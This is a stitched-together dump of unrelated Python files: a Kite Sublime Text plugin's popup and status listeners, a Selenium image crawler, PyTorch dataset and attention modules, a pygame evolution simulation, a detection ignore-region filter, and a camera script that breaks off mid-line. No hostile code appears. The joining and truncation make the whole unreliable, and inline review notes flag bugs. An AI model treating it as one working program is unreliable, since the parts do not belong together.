    _template_path = 'Packages/KiteSublime/lib/assets/' \
                     'function-signature-panel.html'
    _template = None
    _css_path = 'Packages/KiteSublime/lib/assets/styles.css'
    _css = ''

    def on_post_text_command(self, view, command_name, args):
        # Re-render the popup when the user toggles a display option.
        if command_name in ('kite_toggle_popular_patterns',
                            'kite_toggle_keyword_arguments'):
            self.__class__._rerender()

    def on_query_context(self, view, key, operator, operand, match_all):
        if (key == 'kite_signature_shown' and _is_view_supported(view) and
                self.__class__._activated):
            # In case Vintage is enabled, make sure we switch to command mode.
            # Questionable if this is the right behavior, since it differs
            # from the builtin behavior with respect to what happens when the
            # user hits escape while completions are shown - In this case, the
            # user still has to hit escape twice to enter command mode. However,
            # since we've received feedback about this, we've enabled this
            # behavior and have made it configurable.
            if settings.get('hide_signatures_enters_command_mode', True):
                view.run_command('exit_insert_mode')
            return True
        return None

    @classmethod
    def queue_signatures(cls, view, location):
        """Asynchronously request signatures for the given cursor location."""
        deferred.defer(cls._request_signatures,
                       view, cls._event_data(view, location))

    @classmethod
    def hide_signatures(cls, view):
        """Hide the signature popup and clear the cached state."""
        reset = False
        if cls._lock.acquire(blocking=False):
            if cls._activated:
                cls._activated = False
                cls._view = None
                cls._call = None
                reset = True
            cls._lock.release()

        if reset:
            view.hide_popup()

    @classmethod
    def hide_signatures_if_showing(cls, view):
        """Like hide_signatures, but defers the popup dismissal."""
        reset = False
        if cls._lock.acquire(blocking=False):
            if cls._activated:
                cls._activated = False
                cls._view = None
                cls._call = None
                reset = True
            cls._lock.release()

        if reset:
            # This needs to be deferred to handle a race condition when the
            # user is using Vintage. When command mode is entered, the cursor
            # moves back one character, which causes signatures to be requested
            # again. See this class's method `on_query_context` above.
            deferred.defer(view.hide_popup)

    @classmethod
    def is_activated(cls):
        """Return whether a signature popup is currently active."""
        return cls._activated

    @classmethod
    def _request_signatures(cls, view, data):
        """Fetch, transform, and render signature data for the cursor."""
        resp, body = requests.kited_post('/clientapi/editor/signatures', data)

        if resp.status != 200 or not body:
            if resp.status in (400, 404):
                # Kite explicitly has no signature here - hide any stale popup.
                cls.hide_signatures(view)
            return

        resp_data = json.loads(body.decode('utf-8'))
        calls = resp_data['calls'] or []
        if len(calls):
            call = calls[0]

            # For constructors, surface the type's constructor as the function
            # and synthesize the return value from the function name.
            if call['callee']['kind'] == 'type':
                call['callee']['details']['function'] = (
                    call['callee']['details']['type']['language_details']
                    ['python']['constructor'])
                ret = [{'type': call['func_name']}]
                call['callee']['details']['function']['return_value'] = ret

            # Separate out the keyword-only parameters
            func = call['callee']['details']['function']
            func.update({
                'positional_parameters': [],
                'keyword_only_parameters': [],
            })
            for _, param in enumerate(func['parameters'] or []):
                param_details = param['language_details']['python']
                if not param_details['keyword_only']:
                    func['positional_parameters'].append(param)
                else:
                    func['keyword_only_parameters'].append(param)

            # NOTE(review): `in_kwargs` is assigned but never used here;
            # _kwarg_highlighted reads the same field from cls._call instead.
            in_kwargs = call['language_details']['python']['in_kwargs']

            content = None
            if cls._lock.acquire(blocking=False):
                cls._activated = True
                cls._view = view
                cls._call = call
                content = cls._render(call)
                cls._lock.release()

            # Only show the popup if the cursor hasn't moved since the request
            # was issued.
            requested_pos = data['cursor_runes']
            current_pos = EventDispatcher._last_selection_region['end']

            if content is not None and requested_pos == current_pos:
                view.show_popup(content,
                                flags=sublime.COOPERATE_WITH_AUTO_COMPLETE,
                                max_width=400,
                                on_navigate=cls._handle_link_click)

    @classmethod
    def _render(cls, call):
        """Render the signature HTML for the given call data."""
        # In development the template is reloaded on every render.
        if is_development() or cls._template is None:
            cls._template = Template(sublime.load_resource(cls._template_path))
            cls._css = sublime.load_resource(cls._css_path)

        opts = {
            'platform': sys.platform,
            'os_version': os_version(),
            'show_popular_patterns': settings.get('show_popular_patterns'),
            'show_keyword_arguments': settings.get('show_keyword_arguments'),
            'keyword_argument_highlighted': cls._kwarg_highlighted(),
            'keyword_arguments_keys':
                keymap.keystr(keymap.get('kite_toggle_keyword_arguments')),
            'popular_patterns_keys':
                keymap.keystr(keymap.get('kite_toggle_popular_patterns')),
        }

        return htmlmin.minify(cls._template.render(css=cls._css, call=call,
                                                   **opts),
                              remove_all_empty_space=True)

    @classmethod
    def _rerender(cls):
        """Re-render the currently shown popup (e.g. after a toggle)."""
        content = None
        if cls._lock.acquire(blocking=False):
            content = cls._render(cls._call) if cls._activated else None
            cls._lock.release()

        if content is not None:
            cls._view.show_popup(content,
                                 flags=sublime.COOPERATE_WITH_AUTO_COMPLETE,
                                 max_width=400,
                                 on_navigate=cls._handle_link_click)

    @classmethod
    def _handle_link_click(cls, target):
        """Dispatch clicks on links inside the signature popup."""
        if target == 'hide_popular_patterns':
            settings.set('show_popular_patterns', False)
            cls._rerender()

        elif target == 'show_popular_patterns':
            settings.set('show_popular_patterns', True)
            cls._rerender()

        elif target == 'hide_keyword_arguments':
            settings.set('show_keyword_arguments', False)
            cls._rerender()

        elif target == 'show_keyword_arguments':
            settings.set('show_keyword_arguments', True)
            cls._rerender()

        elif (target.startswith('open_browser') or
              target.startswith('open_copilot')):
            # Links are of the form "<action>:<identifier>".
            idx = target.find(':')
            if idx == -1:
                logger.debug('invalid open link format: {}'.format(target))
                return

            action = target[:idx]
            ident = target[idx + 1:]

            if action == 'open_browser':
                link_opener.open_browser(ident)
            else:
                link_opener.open_copilot(ident)

    @classmethod
    def _kwarg_highlighted(cls):
        """Return whether the cursor is inside the call's kwargs section."""
        return (cls._activated and
                cls._call['language_details']['python']['in_kwargs'] and
                cls._call['arg_index'] != -1)

    @staticmethod
    def _event_data(view, location):
        """Build the request payload for the signatures endpoint."""
        return {
            'editor': 'sublime3',
            'filename': realpath(view.file_name()),
            'text': view.substr(sublime.Region(0, view.size())),
            'cursor_runes': location,
        }


class HoverHandler(sublime_plugin.EventListener):
    """Listener which listens to the user's mouse position and forwards
    requests to the hover endpoint.
    """

    _template_path = 'Packages/KiteSublime/lib/assets/hover-panel.html'
    _template = None
    _css_path = 'Packages/KiteSublime/lib/assets/styles.css'
    _css = ''

    def on_hover(self, view, point, hover_zone):
        if not settings.get('show_hover', True):
            return
        if hover_zone != sublime.HOVER_TEXT:
            return
        if (_is_view_supported(view) and _check_view_size(view) and
                len(view.sel()) == 1):
            cls = self.__class__
            deferred.defer(cls._request_hover, view, point)

    @classmethod
    def symbol_at_cursor(cls, view, render=False):
        """Return (word region, symbol) at the cursor, optionally rendering
        the hover popup. Returns (None, None) for unsupported views.
        """
        if (not _is_view_supported(view) or not _check_view_size(view) or
                len(view.sel()) != 1):
            return (None, None)

        # NOTE(review): the `view` parameter is shadowed by the active view
        # here - presumably intentional, but verify against callers.
        view = sublime.active_window().active_view()
        point = view.sel()[0].end()
        points = view.word(point)

        resp, body = requests.kited_get(cls._event_url(view, point))
        if resp.status != 200 or not body:
            return (points, None)

        try:
            resp_data = json.loads(body.decode('utf-8'))
            symbol = None if not resp_data['symbol'] else resp_data['symbol'][0]
            if symbol and render:
                symbol['hint'] = cls._symbol_hint(symbol)

                def func():
                    view.show_popup(cls._render(symbol, resp_data['report'],
                                                view, point),
                                    max_width=1024,
                                    location=point,
                                    on_navigate=cls._handle_link_click)
                sublime.set_timeout_async(func, 0)
            return points, symbol
        except ValueError as ex:
            # Body was not valid JSON.
            return points, None

    @classmethod
    def _request_hover(cls, view, point):
        """Fetch hover data for `point` and show the popup if available."""
        resp, body = requests.kited_get(cls._event_url(view, point))

        if resp.status != 200 or not body:
            return

        resp_data = json.loads(body.decode('utf-8'))
        if resp_data['symbol'] is None:
            return

        symbol = resp_data['symbol'][0]
        symbol['hint'] = cls._symbol_hint(symbol)

        view.show_popup(cls._render(symbol, resp_data['report'], view, point),
                        flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY,
                        max_width=1024,
                        location=point,
                        on_navigate=cls._handle_link_click)

    @classmethod
    def _render(cls, symbol, report, view=None, point=None):
        """Render the hover HTML, including index-based definitions and
        references when enabled.
        """
        if is_development() or cls._template is None:
            cls._template = Template(sublime.load_resource(cls._template_path))
            cls._css = sublime.load_resource(cls._css_path)

        defs = None
        refs = None
        if settings.get_global('show_definitions'):
            window = sublime.active_window()
            defs = window.lookup_symbol_in_index(symbol['name'])
            refs = []
            try:
                # It seems like this function was removed at some point. It
                # still works on some installations of Sublime 3 though.
                #
                # See: https://rollbar.com/Kite/sublime-prod/items/22783/
                refs = window.lookup_references_in_index(symbol['name'])
            except AttributeError:
                pass

            # Exclude the line the cursor is currently on from the results.
            if view is not None and point is not None:
                line, col = view.rowcol(point)
                filename = realpath(view.file_name())
                defs = [d for d in defs
                        if d[0] != filename or d[2][0] != line + 1]
                refs = [r for r in refs
                        if r[0] != filename or r[2][0] != line + 1]

        return htmlmin.minify(
            cls._template.render(css=cls._css, platform=sys.platform,
                                 os_version=os_version(), symbol=symbol,
                                 report=report, definitions=defs,
                                 references=refs),
            remove_all_empty_space=True)

    @classmethod
    def _handle_link_click(cls, target):
        """Dispatch clicks on links inside the hover popup."""
        if (target.startswith('open_browser') or
                target.startswith('open_copilot')):
            idx = target.find(':')
            if idx == -1:
                logger.debug('invalid open link format: {}'.format(target))
                return

            action = target[:idx]
            ident = target[idx + 1:]
            if action == 'open_browser':
                link_opener.open_browser(ident)
            else:
                link_opener.open_copilot(ident)

        elif target.startswith('open_definition'):
            # Definition links look like "open_definition:<file>:<row>".
            idx = target.find(':')
            if idx == -1:
                logger.debug('invalid open definition format: {}'
                             .format(target))
                return

            dest = target[idx + 1:]
            if not dest[dest.rfind(':') + 1:].isdigit():
                logger.debug('invalid open definition format: {}'
                             .format(target))
                return

            sublime.active_window().open_file(dest,
                                              flags=sublime.ENCODED_POSITION)

    @staticmethod
    def _event_url(view, point):
        """Build the hover endpoint URL for the given view and point."""
        editor = 'sublime3'
        filename = quote(path_for_url(realpath(view.file_name())))
        hash_ = _md5(view.substr(sublime.Region(0, view.size())))
        return ('/api/buffer/{}/{}/{}/hover?cursor_runes={}'
                .format(editor, filename, hash_, point))

    @staticmethod
    def _symbol_hint(symbol):
        """Return a short type hint: the kind, or up to three unique instance
        types joined by " | ".
        """
        if symbol['value'][0]['kind'] != 'instance':
            return symbol['value'][0]['kind']
        else:
            unique_types = []
            for v in symbol['value']:
                if v['kind'] != 'instance':
                    continue
                if v['type'] not in unique_types:
                    unique_types.append(v['type'])
                    if len(unique_types) == 3:
                        break
            return ' | '.join(unique_types)


class StatusHandler(sublime_plugin.EventListener):
    """Listener which sets the status bar message when the view is activated
    and on every selection event.
    """

    # Key under which the Kite status is stored on each view.
    _status_key = 'kite'

    def on_activated(self, view):
        deferred.defer(self.__class__._handle, view)

    def on_selection_modified(self, view):
        deferred.defer(self.__class__._handle, view)

    @classmethod
    def erase_all_statuses(cls):
        """Remove the Kite status entry from every open view."""
        for w in sublime.windows():
            for v in w.views():
                v.erase_status(cls._status_key)

    @classmethod
    def _handle(cls, view):
        """Query Kited for this file's status and reflect it in the status
        bar, mapping connection failures to a friendly message.
        """
        if not _is_view_supported(view):
            view.erase_status(cls._status_key)
            return

        if not _check_view_size(view):
            view.set_status(cls._status_key,
                            cls._brand_status('File too large'))
            return

        try:
            url = ('/clientapi/status?filename={}'
                   .format(quote(realpath(view.file_name()))))
            resp, body = requests.kited_get(url)

            if resp.status != 200 or not body:
                view.set_status(cls._status_key,
                                cls._brand_status('Server error'))
            else:
                resp_data = json.loads(body.decode('utf-8'))
                status = resp_data['status']
                if status == 'noIndex':
                    status = 'Ready (unindexed)'
                else:
                    status = status.capitalize()
                view.set_status(cls._status_key,
                                cls._brand_status(status))

        except ConnectionRefusedError as ex:
            view.set_status(cls._status_key,
                            cls._brand_status('Connection error'))

        except ExpectedError as exc:
            if isinstance(exc.exc, ConnectionRefusedError):
                view.set_status(cls._status_key,
                                cls._brand_status('Connection error'))

        except CannotSendRequest as ex:
            logger.debug('could not request status: {}'.format(ex))

    @classmethod
    def _brand_status(cls, status):
        """Prefix the status text with the Kite brand mark."""
        return '𝕜𝕚𝕥𝕖: {}'.format(status)


class MaxFileSizeUpdater(sublime_plugin.EventListener):
    """Listener which updates MAX_FILE_SIZE when a file is focused
    """

    def on_activated(self, view):
        deferred.defer(self.__class__._handle, view)

    @classmethod
    def _handle(cls, view):
        """Best-effort fetch of the max file size setting from Kited.

        NOTE(review): MAX_FILE_SIZE is assigned as a *local* here - without a
        `global MAX_FILE_SIZE` statement this has no effect on the module-level
        value. Also, the bare `except` silently swallows all errors. Confirm
        the intended behavior.
        """
        try:
            resp, body = requests.kited_get(
                '/clientapi/settings/max_file_size_kb')
            if resp.status == 200 and body:
                max_file_size_kb = json.loads(body.decode('utf-8'))
                MAX_FILE_SIZE = max_file_size_kb << 10
        except:
            pass
from concurrent.futures.thread import ThreadPoolExecutor from json import load from selenium.webdriver.remote.webdriver import WebDriver from selenium import webdriver from selenium.webdriver.edge.options import Options as EdgeOptions from time import perf_counter, sleep from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from strformat import StrFormat from platform import system SYSTEM = system() class Crawler: def __init__(self, runtime: dict) -> None: self.config = load(open("startups.json", 'r')) self.ids = runtime["illusts"] self.mode = runtime["mode"] self.headless = "headless" in runtime.keys() self.illusts: dict[str, str] = {} self.pictures: dict[str, list[str]] = {} self.illust_url_base = "" self.pic_url_base = "" self.cap = Crawler.get_cap(runtime) @staticmethod def get_cap(runtime: dict): if "cap" in runtime.keys(): cap = runtime["cap"][0] if cap.isnumeric(): cap = int(cap) if not cap or not isinstance(cap, int): StrFormat.severe_warning("the argument for --cap must be a positive integer.") exit(1) elif cap == 'none': cap = None else: StrFormat.severe_warning("the argument for --cap must be numeric or 'none'.") exit(1) return cap def map(self, id: str): raise NotImplementedError def maps(self): StrFormat.info("Mapping ID...") start = perf_counter() with ThreadPoolExecutor() as pool: for id in self.ids: self.map(id) end = perf_counter() if len(self.illusts) != len(self.ids): exit(1) StrFormat.mapping(self.illusts.keys(), self.illusts.values()) print(f"{StrFormat.functional('Mapping')} finished successfully in {StrFormat.time_str(end - start)}.") def get(self, id: str, name: str): raise NotImplementedError def gets(self): start = perf_counter() with ThreadPoolExecutor(max_workers=4) as pool: for id, name in self.illusts.items(): if self.config["browser"] == 'firefox': pool.submit(self.get, id, name) else: self.get(id, name) end = perf_counter() # dump(self.pictures, open("test.json", 'w'), indent=4) 
print(f"{StrFormat.functional('Crawling')} finished successfully in {StrFormat.time_str(end - start)}.") @staticmethod def scroll(driver: WebDriver): for i in range(1, 5): driver.execute_script( f''' var i = {i} * document.body.scrollHeight/4; window.scrollTo(0,i); ''' ) sleep(2) @staticmethod def init_webdriver(config: dict, headless: bool, is_async=False): cap = None match config["browser"]: case "firefox": options = webdriver.FirefoxOptions() options.headless = headless options.profile = config["firefox"]["profile"] if is_async: cap = DesiredCapabilities.FIREFOX cap["pageLoadStrategy"] = "none" return webdriver.Firefox(options=options, desired_capabilities=cap) case "chrome": options = webdriver.ChromeOptions() if SYSTEM == "Linux": options.headless = headless if headless: options.add_argument("window-size=1920,1080") options.add_experimental_option('excludeSwitches', ['enable-logging']) sep = config["chrome"]["profile"].rfind('/') usr_data_dir, prof_dir = config["chrome"]["profile"][:sep], config["chrome"]["profile"][sep+1:] options.add_argument(f"user-data-dir={usr_data_dir}") options.add_argument(f'profile-directory={prof_dir}') if is_async: cap = DesiredCapabilities.CHROME cap["pageLoadStrategy"] = "none" return webdriver.Chrome(options=options, desired_capabilities=cap) case "edge": options = EdgeOptions() options.use_chromium = True options.headless = headless if headless: options.add_argument("window-size=1920,1080") options.add_experimental_option('excludeSwitches', ['enable-logging']) sep = config["edge"]["profile"].rfind('/') usr_data_dir, prof_dir = config["edge"]["profile"][:sep], config["edge"]["profile"][sep+1:] options.add_argument(f"user-data-dir={usr_data_dir}") options.add_argument(f'profile-directory={prof_dir}') if SYSTEM == 'Linux': options.binary_location = config["edge"]["linux_bin_path"] if is_async: cap = DesiredCapabilities.EDGE cap["pageLoadStrategy"] = "none" return webdriver.Edge(options=options, capabilities=cap)
""" The Code is under Tencent Youtu Public Rule """ from PIL import Image from torch.utils.data import Dataset #val,l-train dataset class MyDataset(Dataset): """ Interface provided for customized data sets names_file:a txt file, each line in the form of "image_path label" transform: transform pipline for mydataset """ def __init__(self, names_file, transform=None): self.names_file = names_file self.transform = transform self.size = 0 self.names_list = [] file = open(self.names_file) for f in file: self.names_list.append(f) self.size += 1 def __len__(self): return self.size def __getitem__(self, idx): image_path = self.names_list[idx].split(' ')[0] image = Image.open(image_path) if(image.mode == 'L'): image = image.convert('RGB') label = int(self.names_list[idx].split(' ')[1]) if self.transform: image = self.transform(image) return image, label
from typing import List

import numpy as np
import torch
import torch.nn as nn


class ScaledDotProductAttention(nn.Module):
    """Scaled dot-product attention: softmax(QK^T / temperature) V."""

    def __init__(self, temperature, attn_dropout=0.1):
        super().__init__()
        self.temperature = temperature  # typically sqrt(d_k)
        self.dropout = nn.Dropout(attn_dropout)
        self.softmax = nn.Softmax(dim=2)

    def forward(self, q, k, v, mask=None):
        # q: (b, lq, d), k: (b, lk, d), v: (b, lk, dv) - batched matmul.
        attn = torch.bmm(q, k.transpose(1, 2))
        attn = attn / self.temperature

        if mask is not None:
            # Masked positions get -inf so they vanish after softmax.
            attn = attn.masked_fill(mask, -np.inf)

        attn = self.softmax(attn)
        attn = self.dropout(attn)
        output = torch.bmm(attn, v)

        return output, attn


class MultiHeadAttention(nn.Module):
    """Multi-head attention with linear Q/K/V projections.

    `d_model` is given as a shape list and flattened via np.prod.
    """

    def __init__(self, n_head: int, d_model: List[int], d_k: int, d_v: int,
                 dropout: float = 0.1):
        super().__init__()
        d_model = np.prod(d_model)  # flatten feature shape to a single dim

        self.n_head = n_head
        self.d_k = d_k
        self.d_v = d_v

        # All heads are projected at once: d_model -> n_head * d_{k,v}.
        self.w_qs = nn.Linear(d_model, n_head * d_k)
        self.w_ks = nn.Linear(d_model, n_head * d_k)
        self.w_vs = nn.Linear(d_model, n_head * d_v)
        nn.init.normal_(self.w_qs.weight, mean=0,
                        std=np.sqrt(2.0 / (d_model + d_k)))
        nn.init.normal_(self.w_ks.weight, mean=0,
                        std=np.sqrt(2.0 / (d_model + d_k)))
        nn.init.normal_(self.w_vs.weight, mean=0,
                        std=np.sqrt(2.0 / (d_model + d_v)))

        self.attention = ScaledDotProductAttention(
            temperature=np.power(d_k, 0.5))
        self.layer_norm = nn.LayerNorm(d_model)

        self.fc = nn.Linear(n_head * d_v, d_model)
        nn.init.xavier_normal_(self.fc.weight)

        self.dropout = nn.Dropout(dropout)

    # def forward(self, q, k, v, mask=None):
    def forward(self, q, k, v):
        # q/k/v: (batch, seq_len, d_model) - inferred from the .size() calls.
        d_k, d_v, n_head = self.d_k, self.d_v, self.n_head

        sz_b, len_q, _ = q.size()
        sz_b, len_k, _ = k.size()
        sz_b, len_v, _ = v.size()

        residual = q

        # Project and split into heads: (b, l, n_head, d).
        q = self.w_qs(q).view(sz_b, len_q, n_head, d_k)
        k = self.w_ks(k).view(sz_b, len_k, n_head, d_k)
        v = self.w_vs(v).view(sz_b, len_v, n_head, d_v)

        # Fold heads into the batch dimension for bmm.
        q = q.permute(2, 0, 1, 3).contiguous().view(-1, len_q, d_k)  # (n*b) x lq x dk
        k = k.permute(2, 0, 1, 3).contiguous().view(-1, len_k, d_k)  # (n*b) x lk x dk
        v = v.permute(2, 0, 1, 3).contiguous().view(-1, len_v, d_v)  # (n*b) x lv x dv

        # mask = mask.repeat(n_head, 1, 1)  # (n*b) x .. x ..
        # output, attn = self.attention(q, k, v, mask=mask)
        output, attn = self.attention(q, k, v)

        # Un-fold heads and concatenate them along the feature dimension.
        output = output.view(n_head, sz_b, len_q, d_v)
        output = output.permute(1, 2, 0, 3).contiguous().view(sz_b, len_q, -1)  # b x lq x (n*dv)

        # Output projection, dropout, then residual + layer norm.
        output = self.dropout(self.fc(output))
        output = self.layer_norm(output + residual)

        return output, attn


class MultiHeadAttentionConv(nn.Module):
    """Multi-head attention over feature maps using 1x1 conv projections.

    `d_model` is the (C, H, W) shape of one feature map; the sequence
    dimension is the leading (map-count) dimension of the input.
    """

    def __init__(self, n_head: int, d_model: List[int], d_k: int, d_v: int,
                 dropout: float = 0.1):
        super().__init__()

        self.n_head = n_head
        self.d_k = d_k
        self.d_v = d_v
        self.d_model = d_model

        C, H, W = d_model
        # Channel counts chosen so a full map flattens to n_head * d_{k,v}.
        out_ch_k = int((n_head * d_k) / (H * W))
        out_ch_v = int((n_head * d_v) / (H * W))
        self.w_qs = nn.Conv2d(C, out_ch_k, 1, 1, 0)
        self.w_ks = nn.Conv2d(C, out_ch_k, 1, 1, 0)
        self.w_vs = nn.Conv2d(C, out_ch_v, 1, 1, 0)
        nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (C + d_k)))
        nn.init.normal_(self.w_ks.weight, mean=0, std=np.sqrt(2.0 / (C + d_k)))
        nn.init.normal_(self.w_vs.weight, mean=0, std=np.sqrt(2.0 / (C + d_v)))

        self.attention = ScaledDotProductAttention(
            temperature=np.power(d_k, 0.5))
        self.layer_norm = nn.InstanceNorm2d(C)

        self.fc = nn.Conv2d(out_ch_v, C, 1, 1, 0)
        nn.init.xavier_normal_(self.fc.weight)

        self.dropout = nn.Dropout(dropout)

    # def forward(self, q, k, v, mask=None):
    def forward(self, q, k, v):
        # q/k/v: (num_maps, C, H, W) - the batch size is implicitly 1.
        d_k, d_v, n_head = self.d_k, self.d_v, self.n_head

        len_q, _, _, _ = q.size()
        len_k, _, _, _ = k.size()
        len_v, _, _, _ = v.size()

        residual = q

        # Project with 1x1 convs, then flatten each map into head vectors.
        q = self.w_qs(q).view(1, len_q, n_head, d_k)
        k = self.w_ks(k).view(1, len_k, n_head, d_k)
        v = self.w_vs(v).view(1, len_v, n_head, d_v)

        q = q.permute(2, 0, 1, 3).contiguous().view(-1, len_q, d_k)  # (n*b) x lq x dk
        k = k.permute(2, 0, 1, 3).contiguous().view(-1, len_k, d_k)  # (n*b) x lk x dk
        v = v.permute(2, 0, 1, 3).contiguous().view(-1, len_v, d_v)  # (n*b) x lv x dv

        # mask = mask.repeat(n_head, 1, 1)  # (n*b) x .. x ..
        # output, attn = self.attention(q, k, v, mask=mask)
        output, attn = self.attention(q, k, v)

        # Restore the spatial layout: (num_maps, C', H, W).
        output = output.view(n_head, 1, len_q, d_v)
        _, H, W = self.d_model
        output = output.permute(1, 2, 0, 3).contiguous().view(
            len_q, -1, H, W)  # b x lq x (n*dv)

        output = self.dropout(self.fc(output))
        output = self.layer_norm(output + residual)

        return output, attn


class RelationModule(torch.nn.Module):
    """Self-relation over ROI features: x + linear(softmax-free affinity @ x).

    NOTE(review): this overrides __call__ instead of forward, which bypasses
    nn.Module hooks - confirm that is intentional.
    """

    def __init__(self, ch_in, atype='dot_product'):
        super().__init__()
        self.atype = atype
        self.ch_in = ch_in
        self.ch_out = ch_in // 8  # bottleneck for the affinity projections
        self.phi = nn.Linear(self.ch_in, self.ch_out)
        self.psi = nn.Linear(self.ch_in, self.ch_out)
        self.linear = nn.Linear(self.ch_in, self.ch_in)

    def __call__(self, x):
        # x: (N_roi, N_feat)
        N_roi, N_feat = x.shape
        phi_x = self.phi(x)
        psi_x = self.psi(x)
        if self.atype == 'dot_product':
            # Pairwise affinity between ROIs: (N_roi, N_roi).
            h = torch.matmul(psi_x, torch.transpose(phi_x, 0, 1))
        else:
            raise NotImplementedError
        # Aggregate features weighted by affinity, averaged over ROIs.
        h = torch.matmul(h, x)
        h = self.linear(h) / len(h)
        return h + x  # residual connection


# if __name__ == '__main__':
#     N_roi = 10
#     N_feat = 256
#     feat = torch.zeros((N_roi, N_feat))
#
#     module = RelationModule(N_feat)
#     module(feat)
import random
import sys
import pygame
import time
from src.carnivorous import *
from src.food import *

# Initialisation
pygame.init()
width, height = 800, 600
black = 0, 0, 0        # Black is for background
white = 255, 255, 255  # White is for big winter event
yellow = 255, 255, 0   # Yellow is for big summer event
red = 255, 0, 0        # Carnivorous color
brown = 90, 40, 0      # Meat color
green = 0, 255, 0      # Vegetables color
blue = 0, 0, 255       # Herbivorous color

# Creating screen
screen = pygame.display.set_mode((width, height))

# Alive entities, null by starting the simulation
activeAnimals = []
activeFood = []

# Title
pygame.display.set_caption("Evolution Simulation")


# Drawing animals function:
def drawing_animals():
    """Draw every active animal as a circle sized by its weight."""
    for animal in activeAnimals:
        if animal.isCarnivorous:
            animal_color = red  # carnivorous will all be red
        else:
            animal_color = blue  # herbivorous will all be blue
        pygame.draw.circle(screen, animal_color,
                           (animal.positionX, animal.positionY), animal.weight)


def drawing_food():
    """Draw every active food item as a circle sized by its quantity."""
    for food in activeFood:
        if food.__class__ == basic_meet:
            food_color = brown  # meat will all be brown
        else:
            food_color = green  # vegetables will all be green
        pygame.draw.circle(screen, food_color,
                           (food.positionX, food.positionY), food.size)


# Simulation loop
begin = True
running = True
simSpeed = 5  # Speed of the simulation (in FPS)
randomMovementDirectionChangeTimer = random.randint(20, 30)
timeToSpawnFood = 4
fpsCounter = 0
clock = pygame.time.Clock()

while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False

    # Background color
    screen.fill(black)

    # Spawn food
    if fpsCounter % timeToSpawnFood == 0:
        for i in range(10):
            activeFood.append(basic_meet(random.randint(50, width - 50),
                                         random.randint(50, height - 50)))

    # Updating food.
    # Fix: the original removed items from activeFood while iterating it,
    # which silently skips the element following each removal. Rebuilding
    # the list drops every depleted food item reliably.
    activeFood = [food for food in activeFood if food.quantity != 0]

    # Change animals movement direction
    if fpsCounter % randomMovementDirectionChangeTimer == 0:
        for current_animal in activeAnimals:
            current_animal.changeDirection()
        # Calculating new random direction change timer
        randomMovementDirectionChangeTimer = random.randint(20, 30)

    # NOTE(review): this rebinds activeAnimals while the for-loop still
    # iterates the original list object - presumably intentional (action
    # returns the updated population); confirm before changing.
    for current_animal in activeAnimals:
        activeAnimals = current_animal.action(width, height, activeAnimals,
                                              activeFood)

    # Drawing on the screen
    drawing_food()
    drawing_animals()

    pygame.display.update()
    fpsCounter += 1
    clock.tick(simSpeed + 20)

    # Stats in console
    if fpsCounter % 100 == 0:
        print(len(activeAnimals))

    # Initialisation of the sim
    if begin:
        while len(activeAnimals) < 30:
            activeAnimals.append(carnivorous(random.randint(55, width - 55),
                                             random.randint(55, height - 55)))
            activeAnimals.append(carnivorous(random.randint(55, width - 55),
                                             random.randint(55, height - 55),
                                             gender=1))
        begin = False

if __name__ == '__main__':
    print("Hello World")
import numpy as np def create_int_img(img): int_img = np.cumsum(img, axis=0) np.cumsum(int_img, axis=1, out=int_img) return int_img def drop_objects_in_igr(gt, det, img_height, img_width): gt_ignore_mask = gt[:, 5] == 0 curgt = gt[np.logical_not(gt_ignore_mask)] igr_region = gt[gt_ignore_mask, :4].clip(min=1) if len(igr_region): igr_map = np.zeros((img_height, img_width), dtype=np.int) for igr in igr_region: x1 = igr[0] y1 = igr[1] x2 = min(x1 + igr[2], img_width) y2 = min(y1 + igr[3], img_height) igr_map[y1 - 1:y2, x1 - 1:x2] = 1 int_igr_map = create_int_img(igr_map) idx_left_gt = [] for i, gtbox in enumerate(curgt): pos = np.round(gtbox[:4]).astype(np.int32).clip(min=1) x = max(1, min(img_width - 1, pos[0])) y = max(1, min(img_height - 1, pos[1])) w = pos[2] h = pos[3] tl = int_igr_map[y - 1, x - 1] tr = int_igr_map[y - 1, min(img_width, x + w) - 1] bl = int_igr_map[max(1, min(img_height, y + h)) - 1, x - 1] br = int_igr_map[max(1, min(img_height, y + h)) - 1, min(img_width, x + w) - 1] igr_val = tl + br - tr - bl if igr_val / (h * w) < 0.5: idx_left_gt.append(i) curgt = curgt[idx_left_gt] idx_left_det = [] for i, dtbox in enumerate(det): pos = np.round(dtbox[:4]).astype(np.int32).clip(min=1) x = max(1, min(img_width - 1, pos[0])) y = max(1, min(img_height - 1, pos[1])) w = pos[2] h = pos[3] tl = int_igr_map[y - 1, x - 1] tr = int_igr_map[y - 1, min(img_width, x + w) - 1] bl = int_igr_map[max(1, min(img_height, y + h)) - 1, x - 1] br = int_igr_map[max(1, min(img_height, y + h)) - 1, min(img_width, x + w) - 1] igr_val = tl + br - tr - bl if igr_val / (h * w) < 0.5: idx_left_det.append(i) det = det[idx_left_det] return curgt, det
# -*- coding: utf-8 -*- """ Created on Fri Sep 28 14:20:44 2018 @author: Evangelos Tzardis """ from time import sleep, time import serial import mylibrary as mlb import rw_config as cfg import numpy as np import imageio import os #def init_camera(): # settings = ['acquisition mode','continuous',\ # 'pixel format','mono16',\ # 'exposure auto','off',\ # 'exposure time', '396',\ # 'width','84',\ # 'height','22',\ # 'offset x','508',\ # 'offset y','546',\ # 'trigger mode','on',\ # 'trigger source','software'] # cfg.write_config(settings) # cam_num = 0 # # # Init camera, set configurations # cam_nodes = mlb.run_camera(cam_num) # # return cam_nodes def init_camera(): # read config file config_with = 'IMAGE SEQUENCE CONFIGURATION' config_with_enum = 1 section = cfg.load_config(config_with) section = section[0] keys = ['height','width'] settings = [ section[key] for key in keys ] # Init camera, set configurations cam_num = 0 nodes = mlb.run_camera(cam_num, config_with_enum) return [nodes, settings] def encode_int2fixednumbytes(number): max_num = 5 enc = str(number)+'\n' while len(enc) < max_num: enc = '0' + enc return str.encode(enc) cam_nodes, cam_settings = init_camera() cam = cam_nodes[0] mode = input('Enter \'c\' for calibration or \'m\' for measurement...') while(mode != 'c' and mode != 'm'): mode = input('Enter \'c\' for calibration or \'m\' for measurement...') #input('Capture sample illuminance: Enter when ready...') #Is = mlb.trigger_image_acquisition(cam_nodes) #Is = gaussian_filter(Is, sigma=5) # #input('Capture reference illuminance: Enter when ready...') #Ir = mlb.trigger_image_acquisition(cam_nodes) #Ir = 